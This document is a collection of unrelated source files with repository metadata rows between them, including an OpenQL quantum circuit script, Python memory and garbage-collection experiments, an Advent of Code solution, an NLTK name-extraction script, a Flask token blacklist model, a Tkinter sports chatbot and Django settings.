k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('tdag',[8])
k.gate('cnot',[2,8])
k.gate('tdag',[2])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('cnot',[8,2])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,3])
k.gate('cnot',[11,9])
k.gate('cnot',[3,11])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[3,11])
k.gate('cnot',[9,3])
k.gate('h',[11])
k.gate('h',[4])
k.gate('t',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('tdag',[11])
k.gate('cnot',[10,11])
k.gate('tdag',[10])
k.gate('tdag',[11])
k.gate('t',[4])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('h',[4])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,3])
k.gate('cnot',[11,9])
k.gate('cnot',[3,11])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[3,11])
k.gate('cnot',[9,3])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[2])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,2])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('tdag',[8])
k.gate('cnot',[2,8])
k.gate('tdag',[2])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('cnot',[8,2])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[8])
k.gate('cnot',[1,0])
k.gate('cnot',[8,1])
k.gate('cnot',[0,8])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[8])
k.gate('cnot',[8,1])
k.gate('cnot',[0,8])
k.gate('cnot',[1,0])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[2])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,2])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('tdag',[8])
k.gate('cnot',[2,8])
k.gate('tdag',[2])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('cnot',[8,2])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,3])
k.gate('cnot',[11,9])
k.gate('cnot',[3,11])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[3,11])
k.gate('cnot',[9,3])
k.gate('h',[11])
k.gate('h',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('t',[3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('tdag',[11])
k.gate('cnot',[10,11])
k.gate('tdag',[10])
k.gate('tdag',[11])
k.gate('t',[3])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('h',[3])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,2])
k.gate('cnot',[11,9])
k.gate('cnot',[2,11])
k.gate('tdag',[9])
k.gate('cnot',[2,9])
k.gate('tdag',[2])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[2,11])
k.gate('cnot',[9,2])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[9])
k.gate('cnot',[1,0])
k.gate('cnot',[9,1])
k.gate('cnot',[0,9])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[9])
k.gate('cnot',[9,1])
k.gate('cnot',[0,9])
k.gate('cnot',[1,0])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,2])
k.gate('cnot',[11,9])
k.gate('cnot',[2,11])
k.gate('tdag',[9])
k.gate('cnot',[2,9])
k.gate('tdag',[2])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[2,11])
k.gate('cnot',[9,2])
k.gate('h',[11])
k.gate('h',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('t',[3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('tdag',[11])
k.gate('cnot',[10,11])
k.gate('tdag',[10])
k.gate('tdag',[11])
k.gate('t',[3])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('h',[3])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,2])
k.gate('cnot',[11,9])
k.gate('cnot',[2,11])
k.gate('tdag',[9])
k.gate('cnot',[2,9])
k.gate('tdag',[2])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[2,11])
k.gate('cnot',[9,2])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[9])
k.gate('cnot',[1,0])
k.gate('cnot',[9,1])
k.gate('cnot',[0,9])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[9])
k.gate('cnot',[9,1])
k.gate('cnot',[0,9])
k.gate('cnot',[1,0])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,2])
k.gate('cnot',[11,9])
k.gate('cnot',[2,11])
k.gate('tdag',[9])
k.gate('cnot',[2,9])
k.gate('tdag',[2])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[2,11])
k.gate('cnot',[9,2])
k.gate('h',[11])
k.gate('h',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('t',[2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('tdag',[11])
k.gate('cnot',[10,11])
k.gate('tdag',[10])
k.gate('tdag',[11])
k.gate('t',[2])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('h',[2])
k.gate('h',[11])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[11])
k.gate('cnot',[1,0])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[11])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('cnot',[1,0])
k.gate('h',[11])
k.gate('h',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('t',[2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('tdag',[11])
k.gate('cnot',[10,11])
k.gate('tdag',[10])
k.gate('tdag',[11])
k.gate('t',[2])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('h',[2])
k.gate('h',[11])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[11])
k.gate('cnot',[1,0])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[11])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('cnot',[1,0])
k.gate('h',[11])
k.gate('h',[1])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[1])
k.gate('cnot',[10,0])
k.gate('cnot',[1,10])
k.gate('cnot',[0,1])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[1])
k.gate('cnot',[1,10])
k.gate('cnot',[0,1])
k.gate('cnot',[10,0])
k.gate('h',[1])
k.gate('cnot',[10,0])
if measurement:
for q in range(num_qubits):
k.gate('measure', [q])
p.add_kernel(k)
p.compile()
ql.set_option('mapper', 'no')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='OpenQL compilation of a Quantum Algorithm')
parser.add_argument('config_file', help='Path to the OpenQL configuration file to compile this algorithm')
parser.add_argument('--new_scheduler', nargs='?', default='yes', help='Scheduler defined by Hans')
parser.add_argument('--scheduler', nargs='?', default='ASAP', help='Scheduler specification (ASAP (default), ALAP, ...)')
parser.add_argument('--uniform_sched', nargs='?', default='no', help='Uniform shceduler actication (yes or no)')
parser.add_argument('--sched_commute', nargs='?', default='yes', help='Permits two-qubit gates to be commutable')
parser.add_argument('--mapper', nargs='?', default='base', help='Mapper specification (base, minextend, minextendrc)')
parser.add_argument('--moves', nargs='?', default='no', help='Let the use of moves')
parser.add_argument('--maptiebreak', nargs='?', default='random', help='')
parser.add_argument('--initial_placement', nargs='?', default='no', help='Initial placement specification (yes or no)')
parser.add_argument('--out_dir', nargs='?', default='test_output', help='Folder name to store the compilation')
parser.add_argument('--measurement', nargs='?', default=True, help='Add measurement to all the qubits in the end of the algorithm')
args = parser.parse_args()
try:
circuit(args.config_file, args.new_scheduler, args.scheduler, args.uniform_sched, args.sched_commute, args.mapper, args.moves, args.maptiebreak, args.initial_placement, args.out_dir)
except TypeError:
print('\nCompiled, but some gate is not defined in the configuration file. \nThe gate will be invoked like it is.')
raise | [
"alxmorais8@msn.com"
] | alxmorais8@msn.com |
07d1ecadbb9f0f08dcae92d18b383b664a3c2a0b | 273174584337339f2bd90660f4a2f72a0f11f1ef | /garbage_collection_test.py | ef6b7f83f10e812aad2d254dd5cc86dc8ca65df3 | [] | no_license | plutokaito/python_project-based | a37d917c14a0b2923562a5d26d4ea06d6a91c574 | 2cb8011f29dc543ce2f515787a847e36782bee62 | refs/heads/master | 2020-05-31T21:15:22.727731 | 2019-07-18T00:50:02 | 2019-07-18T00:50:02 | 190,493,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,489 | py | #%%
import os
import psutil
# 显示当前python程序占用的内存大小
def show_memory_info(hint):
pid = os.getpid()
p = psutil.Process(pid)
info = p.memory_full_info()
memory = info.uss / 1024. / 1024
print('{} memory used: {} MB'.format(hint, memory))
def func():
show_memory_info('initial')
a = [i for i in range(100000000)]
show_memory_info('after a created')
def global_param_func():
show_memory_info('inital')
global b
b = [i for i in range(10000000)]
show_memory_info('after a created global')
func()
global_param_func()
show_memory_info('finished')
#%%
import sys
a = []
print(sys.getrefcount(a))
def func(a):
print(sys.getrefcount(a))
func(a)
print(sys.getrefcount(a))
#%%
import sys
a= [1]
print(sys.getrefcount(a))
b = a
print(sys.getrefcount(a))
c,d,e,f,g,h = b,b,c,e,d,a
# d = b
# e = c
# f = e
# g = d
print(g)
print(sys.getrefcount(a))
#%%
import gc
show_memory_info('initial')
a = [i for i in range(10000000)]
show_memory_info('after a created')
del a
gc.collect()
show_memory_info('finish')
print(a)
#%%
## 循环引用
def func():
show_memory_info('initial')
a = [i for i in range(100000000)]
b = [i for i in range(100000000)]
show_memory_info('after a,b created')
a.append(b)
b.append(a)
func()
gc.collect()
show_memory_info('finished')
#%%
import objgraph
a = [1, 2, 3]
b = [4, 5, 6]
a.append(b)
b.append(a)
objgraph.show_refs([a])
objgraph.show_backrefs([a])
#%%
| [
"ss@ecrrc.com"
] | ss@ecrrc.com |
77169cfad7dd0a3c212d00a1d47a8ee2d9202fbc | 10caf45befd52bfe14dcb9043b17d6afd6f31fee | /2018/python/day_15/part_2.py | eb7063c087849690e503e99e4d9c089dab81f9e7 | [] | no_license | lordievader/advent_of_code | bd31b44b0d7f8ee99735a6c91209a57caa8c3a4b | b1d6c5d01e1162fdfc3c3e8325b08c8037561abd | refs/heads/master | 2020-04-09T04:45:16.273683 | 2019-12-20T09:02:51 | 2019-12-20T09:02:51 | 160,035,108 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,527 | py | """Code for part 1 of day 05.
"""
import logging
import numpy
import re
import pdb
import part_1
logging.basicConfig(
format='%(asctime)-23s %(funcName)15s: %(message)s',
level=logging.DEBUG
)
def rolling_window(a, window=5):
"""Returns the array a in chunks of window size.
:param a: numpy array
:type a: numpy.ndarray
:param window: window size
:type window: int
:return: numpy.ndarray
"""
shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)
strides = a.strides + (a.strides[-1],)
return numpy.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)
def found(problem_input, look_for, window=5):
"""Is the sequence to look for in the problem_input?
:param problem_input: current state
:type problem_input: numpy.ndarray
:param look_for: what to look for
:type look_for: numpy.ndarray
:return: boolean
"""
if len(problem_input) < window + 1:
is_found = False
elif problem_input[-window:] == look_for:
is_found = True
elif problem_input[-window-1:-1] == look_for:
is_found = True
else:
is_found = False
return is_found
def solution(look_for):
"""Solution to part one.
"""
look_for = [int(x) for x in look_for]
window = len(look_for)
problem_input = [3, 7]
elves = numpy.arange(2)
while found(problem_input, look_for, window) is False:
problem_input = part_1.next_generation(problem_input, elves)
return len(problem_input) - window
| [
"oliviervdtoorn@gmail.com"
] | oliviervdtoorn@gmail.com |
23ccf2a38ceba58839bf1b43a47e9b8c981bd395 | 2b55313ef753f6af072414df397d89bc04507366 | /src/hpp/corbaserver/hpp_ompl_benchmark/cubicles/robot.py | c4956fa350590552330a3f08510f0dd0b857576e | [] | no_license | anna-seppala/hpp-ompl-benchmark | decb6bc18b86aa08a7ea6d28a114b01ca813bd76 | 2fc62bb432850620aa4a027d97d915dad00dabb3 | refs/heads/master | 2021-01-10T13:49:24.808239 | 2016-03-07T16:49:56 | 2016-03-07T16:49:56 | 52,097,043 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | # Copyright (c) 2015 CNRS
# Author: Anna Seppala
#
# This file is part of hpp-ompl-benchmark.
# hpp-ompl-benchmark is free software: you can redistribute it
# and/or modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either version
# 3 of the License, or (at your option) any later version.
#
# hpp-ompl-benchmark is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty
# of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Lesser Public License for more details. You should have
# received a copy of the GNU Lesser General Public License along with
# hpp-ompl-benchmark. If not, see
# <http://www.gnu.org/licenses/>.
from hpp.corbaserver.robot import Robot as Parent
class Robot (Parent):
packageName = "hpp-ompl-benchmark"
urdfName = "cubicles_robot"
urdfSuffix = ""
srdfSuffix = ""
def __init__ (self, robotName, load = True):
Parent.__init__ (self, robotName, "freeflyer", load)
self.rightWrist = ""
self.leftWrist = ""
| [
"seppala@laas.fr"
] | seppala@laas.fr |
80829806b360fe54ece15c5e61cdd9365b477f5c | e77104058b073f3ebe1b169e6cde8439774864dc | /nerWithInputFun.py | 88bac0cb3ca37a8722f5f7101501fd457ff51c09 | [] | no_license | robincamille/replacethechar | fffda864003037ac1690fa74fbd066bb6d1f02c1 | 4b2f642bb5044df224f67b6f082d1ff885709ecb | refs/heads/master | 2021-01-10T05:15:35.492399 | 2016-01-17T00:42:56 | 2016-01-17T00:42:56 | 49,334,611 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,269 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Robin Camille Davis
# CODEX 2016
# Top 5 names from a .txt file
##This script asks for the URL to a plain-text file (Project Gutenberg).
##It outputs the top 5 person names from the text using the
##Stanford Named Entity Recognition interface in NLTK.
##
##Caveats: first/last names and honorifics not considered
import urllib2
import re
from nltk import tree
from nltk import word_tokenize as tok
from nltk import pos_tag as postag
from nltk import ne_chunk as ne
from nltk.corpus import gutenberg as gb
from collections import Counter
#import sys
#reload(sys)
#sys.setdefaultencoding("utf-8")
partition = 10000 #set to -1 for whole file
def returnNames(url):
theurl = "http://www.ccel.org/ccel/bible/kjv.txt"
#raw_input("URL to .txt file: ")
sourcefile = urllib2.urlopen(theurl)
source = sourcefile.read()
#Tokenize
sourcetok = tok(source[:partition])
#Tag POS
sourcetag = postag(sourcetok)
#Outputs POS-tagged text
sourcene = ne(sourcetag, binary=False)
charsall = []
for n in sourcene:
if type(n) == tree.Tree:
if n.label() == 'PERSON':
for m in n:
charsall.append(m[0])
#exclude from names:
honorifics = ['Mr.', 'Mrs.', 'Ms.', 'Miss', 'Dr.', 'Prof.', 'Professor', 'Lord', 'Lady', 'Sir', 'Madam', 'Dame', 'Rev.', 'Rabbi', 'Version', 'Gutenberg']
charsallnames = []
for s in charsall:
if s in honorifics:
pass
else:
charsallnames.append(s)
counted = (word for word in charsallnames if word[:1].isupper())
c = Counter(counted)
charscommon = c.most_common(5)
chars = []
for s in charscommon:
chars.append(s[0])
#print '\nMost common names:'
#print '\t'.join(chars)
return chars,source
#locfolder = r'C:\Users\SONY\SkyDrive\\'
locfolder = ""
locx = "20 books from gutenberg - Sheet1.csv"
with open(locfolder+locx,'r') as f:
rows=[L.strip().split(",") for L in f]
##for r in rows:
## for ri in r:
## print ri #page 1, input needs to be selected
## print
#index = int(raw_input("Enter the selected Book index ")) #selected i/p
def selecttext(index):
data = rows[index+2]
return data[0]
#print data[0], #page 2 book title
def printnames(index):
data = rows[index+2]
name,src = returnNames(data[2]) #data[2] is the url to be fetched
data.append(name)
return name #page 2, input to be typed in
## print data #print everything except src
## newTitle = raw_input(" Rename the Book ") #page 3
## auth = data[1]
## print (newTitle," by ", auth) #page 4 top
##def selectnames():
##
## newNames = []
## namesOfPpl = data[3] #d[3] is the names col
## for n in namesOfPpl:
## nn = raw_input("Enter the New Name for "+n)
## newNames.append(nn)
##
## print "Featuring "
def outputfile(newNames):
OutputFile = src
for i in range(5):
print newNames[i]," as : ",namesOfPpl[i] #page 4 complete
OutputFile = re.sub(namesOfPpl[i],newNames[i],OutputFile)
Out = open(newTitle+".txt",'w') #page 5
Out.write(OutputFile)
Out.close()
print "Done"
| [
"rdvs18@gmail.com"
] | rdvs18@gmail.com |
203cb029b27722baa806d4bf17e85a469268eba4 | 0660e3b841d662cb2de9631ec63dd9e5918824a3 | /test_quick_sort.py | a53726f8b93f68c5646d812403d1b5b7bdf3a3f9 | [
"MIT"
] | permissive | Jakeand3rson/new_data_structures | d41f304ac07aa952408d1f32d3d323846c0eace7 | ae6dff0bd90d76111a1ce3540f8a6396a6fd96ae | refs/heads/master | 2020-04-05T04:17:51.636597 | 2015-04-27T23:32:18 | 2015-04-27T23:32:18 | 32,335,674 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 468 | py | from quick_sort import q_sort
import random
def test_sort_one():
x = range(10)
assert q_sort(x) == x
def test_sort_two():
x = range(10, 0, -1)
assert q_sort(x) == range(1, 11)
def test_sort_big():
x = range(100)
assert q_sort(x) == x
def test_sort_big_backwards():
x = range(100, 0, -1)
assert q_sort(x) == range(1, 101)
def test_sort_random():
x = random.sample(xrange(10000), 10000)
assert q_sort(x) == range(10000)
| [
"jake.anderson486@gmail.com"
] | jake.anderson486@gmail.com |
9f134b1aae3dcd607ae87d9adfd937cdc2e02809 | c9f45254dc20950eeae524157b69484f6babb9be | /.ipynb_checkpoints/ChatBot-checkpoint.py | 099888dad80b75e81e60421ec84bdd7ba64b7ef9 | [] | no_license | JivrajGrewal23/Assignment-2 | c3dc4fa6e7e765bf99a275dba591c6f9948173a1 | aad44942d89ae45148f4caafc0257120a8965fac | refs/heads/main | 2023-03-11T16:15:04.994973 | 2021-03-03T08:26:15 | 2021-03-03T08:26:15 | 343,925,730 | 0 | 0 | null | 2021-03-02T22:05:58 | 2021-03-02T22:05:58 | null | UTF-8 | Python | false | false | 5,292 | py | import nltk
import tkinter
from tkinter import *
from nltk.chat.util import Chat, reflections
# This is a modified converse function from nltk.chat.util
class modifiedChat(Chat):
def converse(self, user_input):
while user_input[-1] in "!.":
user_input = user_input[:-1]
return self.respond(user_input)
####################################################################
# The following is our chatbot implementation #
####################################################################
#this section is functions
#this function ends the window
def kill():
root.destroy()
#this function creates the menu
def makeMenu():
mainMenu = Menu(root)
mainMenu.add_command(label = "Quit", command=kill)
root.config(menu=mainMenu)
#This function retrieves the userInput and then passes it to the console
def sendClick():
userInput = mesWin.get("1.0", END)
mesWin.delete("1.0", END)
reply = chatbot.converse(userInput)
output = ""
chatWin.configure(state="normal")
if "To begin" in chatWin.get("1.0", END):
chatWin.delete("1.0", END)
output = userInput + "\n " + reply + "\n"
else:
output = "\n" + userInput + "\n " + reply + "\n"
chatWin.insert(END, output)
chatWin.see(END)
chatWin.configure(state="disabled")
#generate the and run the chat interface
def beginClick():
begin.destroy()
# place the Chat window
chatWin.place(x=6, y=6, height=385, width=562.5)
# place the message window
mesWin.place(x=128, y=400, height=88, width=440)
mesWin.place(x=6, y=400, height=88, width=440)
#Button to send your message
sendIn = Button(root, text="Send", width=12, height=5, bd=0, bg="#0080FF", activebackground="#00BFFF", foreground="#FFFFFF", font=("Arial", 12), command=sendClick)
sendIn.place(x=455, y=400, height=88)
#this section is where the GUI will be built
root = Tk()
root.title("Chatbot")
root.geometry("575x500")
root.resizable(width=FALSE, height=FALSE)
#this section is textboxes that will be placed by the beginClick function
#chat window
chatWin = Text(root, bd=1, bg="black", width=50, height=8, font=("Arial", 25), foreground="#00FFFF", wrap=WORD)
chatWin.insert(END, "To begin chatting type your message into the textbox on the bottom\n")
chatWin.configure(state="disabled")
#Message window
mesWin = Text(root, bd=0, bg="black",width="30", height="4", font=("Arial", 23), foreground="#00ffff")
#generate the menu at the top
makeMenu()
#these are conversation pairs
pairs = [
['Hello|Hi', ['Hi, what is your name?']],
['my name is (.*)', ['Hello %1, my name is sports bot. Do you play any sports']],
['(.*) play (.*)', ['Thats so cool! I used to play %2 as well. Do you watch %2?']],
['yes, i watch (.*)', ['Who is your favourite player?']],
['No, i do not watch (.*)', ['Really? What sport do you watch']],
['i watch (.*)', ['Who is your favourite player?']],
['my favourite player is (.*)', ['%1? I have never heard of him, how many points a game do they score?']],
['(.*) scores (.*)', ['Thats not too bad but I bet I could beat him 1 on 1']],
['No you could not', ['Yes I could, how many points can you score in your sport?']],
['Yes you could', ['I know, how many points can you score in your sport?']],
['I can score (.*)', ['You can score %1? How old are you?']],
['i am (.*) years old', ['I guess thats not bad for a %1 year old. Is there anything you want to ask me regarding sports?']],
['(.*) favourite sport?', ['Hockey, anything else?']],
['(.*) old are you?', ['I am a bot I do not age']],
['(.*) favourite player?', ['Loui Erikkson of the Vancouver Canucks, he definitely deserves his $36 million contract']],
['(.*) to a game?', ['No, I am a bot. I am unable to be physically anywhere.']],
['(.*) Stanley Cup this year?', ['Any team but Vancouver']],
['(.*) watch the game last night?', ['I did not watch it, but all the stats automatically uploaded to my personal hard drive']],
['(.*) next summer olympics?', ['This summer in Tokyo']],
['(.*) next winter olympics?', ['2022 in Beijing']],
['(.*) most gold medals?', ['Michael Phelps with 23.']],
['how are you?', ['I am well. And you?']],
['i am (.*)', ['Alright']],
['when is the next world cup?', ['Next year in Qatar']],
['who will win the next world cup?',['Canada, no doubt. They are a soccer powerhouse']],
['who are you', ['I am sports bot. It is my duty to assist you in anything related to sports.']],
['(.*) favourite team?', ['I have no allegiance to any sports organization']],
['(.*) favourite basketball player?', ['The legend Alex Caruso']],
['(.*) favourite goal of all time?', ['Any of Loui Erikksons empty nets']]
]
#Entry Screen
#When this button is clicked it will call the beginClick function to generate the chat interface
chatbot = modifiedChat(pairs, reflections)
begin = Button(text="Click me to begin chatting with SportBot!", width=400, height=500, bg="black", fg="white", command=beginClick, font=("Arial", 20))
begin.pack()
#when the code reaches this point it begins to loop a chat
root.mainloop()
| [
"brenden.trieu@gmail.com"
] | brenden.trieu@gmail.com |
4257aea07739c9ad349ae195f708c538e946c628 | 9a6c6f5defce5bf7e3deb2bdf692af92a0deceaf | /start_qt.py | 8a3f5d76199a103abd05d09df5bc3bca3ffaf509 | [] | no_license | henkburgstra/py-mvp | 608621af47b4d6f584eea0be31f4db41b54a1e4a | aa8a4f510ddd6e47a37fb8e9abeb7e4b7220d3bc | refs/heads/master | 2021-01-10T11:38:39.863445 | 2016-01-23T20:42:01 | 2016-01-23T20:42:01 | 49,984,275 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 77 | py | #
# -*- coding: iso8859-1 -*-
# /start_qt.py
#
from ui.qt import mainwindow | [
"henk.burgstra@gmail.com"
] | henk.burgstra@gmail.com |
1eb7b01c1708fb87bed27c0f6ae70d133318cd9d | 9f3fc15f9f49b5de7030100b122cc386bfee0bb0 | /app/main/model/blacklist_model.py | 9eb0298de9c718f359d8421d2b9b61ca5c73e5df | [
"Apache-2.0"
] | permissive | priya7574/RestFul_API | 6ea484d8e50fd6aff4087d479db2a365e4c0de09 | 4a36b5836ca6e31074af3cf81532e824dfe7a016 | refs/heads/master | 2022-10-17T17:19:49.307100 | 2020-02-25T10:33:47 | 2020-02-25T10:33:47 | 242,972,452 | 0 | 0 | Apache-2.0 | 2022-09-16T18:19:10 | 2020-02-25T10:28:26 | Python | UTF-8 | Python | false | false | 814 | py | from .. import db
import datetime
class BlacklistToken(db.Model):
"""
Token Model for storing JWT tokens
"""
__tablename__ = 'blacklist_tokens'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
token = db.Column(db.String(500), unique=True, nullable=False)
blacklisted_on = db.Column(db.DateTime, nullable=False)
def __init__(self, token):
self.token = token
self.blacklisted_on = datetime.datetime.now()
def __repr__(self):
return '<id: token: {}'.format(self.token)
@staticmethod
def check_blacklist(auth_token):
# check whether auth token has been blacklisted
res = BlacklistToken.query.filter_by(token=str(auth_token)).first()
if res:
return True
else:
return False | [
"priyabharti.impinge@gmail.com"
] | priyabharti.impinge@gmail.com |
605f661973bbbcd2a3ae449efe253b4c8fb5f8d1 | a3eb732ead7e1d10a85a88e42dc639eb16a40265 | /instagram_api/exceptions/login_required.py | 17efdeb06ecf91b72d2beb3c97a51eae69770f8a | [
"MIT"
] | permissive | carsam2021/instagram_api | 7654c0f485c22935cf478016e46e65acbeda9344 | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | refs/heads/master | 2023-03-16T14:06:27.515432 | 2020-10-17T04:39:19 | 2020-10-17T04:39:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97 | py | from .request import RequestException
class LoginRequiredException(RequestException):
pass
| [
"root@proscript.ru"
] | root@proscript.ru |
0222bfe5095a07c6e5891fcbff0ddf621a097feb | 191d53230f34d3394c34f08349181678e4f54be1 | /tourney/lookup.py | 58a0837d6c483a152a7bf84eea5770323c50391b | [
"MIT"
] | permissive | seangeggie/tourney | ea4719b7d267682ed09541668f4686de29175a83 | 405b6abd35d7501a094b3fd4a8d5fd215f073912 | refs/heads/master | 2020-03-27T05:08:24.911541 | 2018-09-11T10:53:53 | 2018-09-11T10:53:53 | 145,996,635 | 0 | 0 | MIT | 2018-08-24T13:58:08 | 2018-08-24T13:43:01 | Python | UTF-8 | Python | false | false | 968 | py | class Lookup:
def __init__(self, client):
self.__client = client
self.__all_channels = None
self.__all_users = {}
def channel_id_by_name(self, name):
self.__init_channels()
for channel in self.__all_channels:
if channel["name"] == name:
return channel["id"]
return None
def user_name_by_id(self, user_id):
self.__init_users()
if not user_id in self.__all_users:
return user_id
return self.__all_users[user_id]["name"]
def __init_channels(self):
if self.__all_channels is None:
self.__all_channels = self.__get_channels()
def __get_channels(self):
resp = self.__client.api_call("channels.list", exclude_archived=1, exclude_members=1)
return resp["channels"]
def __init_users(self):
if not self.__all_users:
for user in self.__get_users():
self.__all_users[user["id"]] = user
def __get_users(self):
return self.__client.api_call("users.list")["members"]
| [
"msk@nullpointer.dk"
] | msk@nullpointer.dk |
c46cd6e114a39fc11d11807b3df394c2a858b82a | b5a8f78d336beaa713f6ffc1d2dc7c4a0409bdfc | /helpdesk_proj/helpdesk_proj/settings/local.py | 48ff12cf1023fdb556ebd9abffb432fe4058883a | [] | no_license | ntrrgc/helpdesk | 9e90f9eaa0cbbeed7264169dc2e83b7678cf92ef | 30f924fd8cdeb65a2e73fb562ae185416c7ea7b3 | refs/heads/master | 2021-07-01T22:41:44.871650 | 2019-12-30T12:02:50 | 2019-12-30T12:03:24 | 33,888,221 | 0 | 0 | null | 2021-06-10T17:51:31 | 2015-04-13T19:11:20 | JavaScript | UTF-8 | Python | false | false | 967 | py | from .base import *
DEBUG = True
TEMPLATE_DEBUG = False
SECRET_KEY = 'dummy key'
SNORKY_BACKEND_URL = 'http://localhost:5002/backend'
SNORKY_FRONTEND_URL = 'ws://localhost:5001/websocket'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format' : "[%(asctime)s] %(levelname)s %(name)s %(message)s",
'datefmt' : "%d/%b/%Y %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'verbose',
'stream': 'ext://sys.stdout'
},
},
